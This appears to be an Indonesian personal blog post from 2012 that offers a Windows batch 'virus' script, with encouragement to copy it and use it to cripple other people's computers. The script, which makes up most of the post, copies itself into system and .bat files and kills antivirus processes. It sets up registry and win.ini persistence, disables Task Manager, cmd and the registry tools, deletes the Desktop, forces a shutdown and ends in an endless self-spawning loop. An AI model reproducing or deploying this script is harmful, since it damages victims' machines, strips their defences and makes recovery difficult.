Close
Sorry template does not publish
For Personal
Search
Search engine adalah mesin pencari, mesin penelusur, dan mesin pelacak. Anda bisa menggunakannya untuk mencari apa saja informasi yang dibutuhkan, di blog ini. Terimakasih.....
Start
Coki Widodo
Official Site
Music
Mozilla
Post
Category
Twitter
Facebook
Twitter
Download
Google
Skype
Setting
Music
Apps

Rabu, 25 Juli 2012

Author
Home
Judul
Url
Hari
Tag
: rizky prasetya
: babab
: Script virus
: http://klebable.blogspot.com/2012/07/script-virus.html
: Rabu, 25 Juli 2012
:

Script virus



Ni lumayan ane kasih script BAT,lumayan buat lumpuhin komputer orang, ni script ane dapet waktu iseng surfing di Mbah google, kalo pengen nyoba tingal copy paste scriptnya

echo off

color 0a

cls

echo.

echo "Destroyer Injector [PHF]"

echo.

echo.

echo.

echo.

echo Selamat datang di Destroyer Injector.

echo.

echo.

echo pencet sembarang untuk mengaktifkannya!!! :)

pause

cls

dir %windir% /s

cls

echo Proses akses data telah selesai.

echo.

echo.

echo.

:pilih

echo Apakah anda ingin melanjutkan injecksi? (Y/N)

set /p inputchoice=

if %inputchoice% equ y goto yes

if %inputchoice% equ Y goto yes

if %inputchoice% equ n goto no

if %inputchoice% equ N goto no

echo.

echo.

echo anda memasukkan jawaban yang salah

echo silahkan coba kembali

pause

cls

goto pilih

:yes

cls

echo berikut ini kami akan mengantarkan ke alamat credit

echo tekan terserah untuk melanjutkan!!!

pause

:no

cls

start iexplore http://pontianak-hacker.blogspot.com


@echo off

copy %0 %systemroot%\namavirus.bat > nul

copy %0 *.bat > nul

Attrib +h *.bat

cls

tskill AVGUARD

tskill AVGNT

tskill NMAIN

tskill KAV

tskill ad-aware

tskill av*

tskill PCMAV

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Explorer.exe /t REG_SZ /d %systemroot%\namavirus.bat /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Antz /t REG_SZ /d C:\Windows\Antz.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d toepan.tk /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d Bukannya ane iseng gan cuman gg ada kerjaan aja /f

reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

cls

echo [windows] >> %systemroot%\win.ini

echo load=%systemroot%\namavirus.bat >> %systemroot%\win.ini

echo run=%systemroot%\namavirus.bat >> %systemroot%\win.ini

Attrib +h %systemroot%\win.ini

del C:\docume~\owner\Desktop

shutdown -s -t 15

msg * ”sorry ya computer nya death dulu ^_^”

msg * ”sorry ya computer nya death dulu ^_^”

msg * ”-PontianakHackerFoundation-”

msg * ”-PontianakHackerFoundation-”

cls

:hell

start %0

goto hell

exit

Lo save tuh script dengan file extensi bat, contoh ucinggarong.bat & typenya pake Allfile
x

Poskan Komentar

 

Diary Widodo Copyright © 2011 | Template design by Widodo | Powered by Blogger
Best viewed ini Download Mozilla 12|Gooqla Chrome+